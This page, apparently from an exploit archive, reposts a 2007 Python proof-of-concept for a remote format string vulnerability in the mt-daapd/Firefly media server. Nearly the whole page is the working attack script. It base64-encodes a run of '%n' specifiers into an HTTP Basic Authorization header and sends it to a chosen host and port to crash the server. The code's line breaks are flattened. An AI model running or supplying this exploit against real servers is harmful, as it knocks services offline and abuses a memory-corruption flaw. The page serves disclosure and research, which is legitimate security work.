Home / os / solaris

uph0703.py.txt

Posted on 03 November 2007

#!C:python25python25.exe """ Advisory : [UPH-07-03] mt-dappd/Firefly media server remote format string vulnerability Discovered by nnp http://www.unprotectedhex.com """ import sys import socket import base64 if len(sys.argv) != 3: sys.exit(-1) fmt_str = base64.b64encode("%n"*16 + ":" + "password") kill_msg = "GET /xml-rpc?method=stats HTTP/1.1 Authorization: Basic " \n+ fmt_str + " " host = sys.argv[1] port = sys.argv[2] print '[+] Host : ' + host print '[+] Port : ' + port print "[+] Sending " print kill_msg s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, int(port))) s.send(kill_msg) s.close()

 

TOP